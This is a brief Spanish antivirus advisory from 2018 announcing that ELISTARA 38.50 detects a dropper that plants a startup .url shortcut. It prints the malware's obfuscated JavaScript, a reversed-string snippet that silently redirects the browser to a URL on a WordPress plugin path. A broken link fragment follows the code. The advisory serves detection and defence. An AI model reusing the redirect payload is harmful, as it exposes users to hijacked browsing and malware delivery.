NUEVA FAMILIA DE MALWARES URL.INI QUE PASAMOS A CONTROLAR

A partir del ELISTARA 38.50 de hoy pasamos a controlar este nuevo malware que consta de un empaquetado que ejecuta un dropper que instala una URL en la carpeta de inicio, para ser ejecutada en el proximo reinicio

empaquetado …. dropper
my_Bin.exe —> pFkMx6mGt2FTyWmBhed.exe

que instala el acceso a esta URL en %WinIni%:

pFkMx6mGt2FTyWmB.exe.url

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/625c90a07d56b8ead5b1cdf39649834d508bcd5899990c27ba8937436c017f34/analysis/1519122377/” target=”_blank” rel=”noopener”>Y el del empaquetado inicial

Dicha versión del ELISTARA V38.50 que lo detecta y elimina, estará disponible en nuestra web a partir del 21/2 prox

saludos

ms, 20/2/2018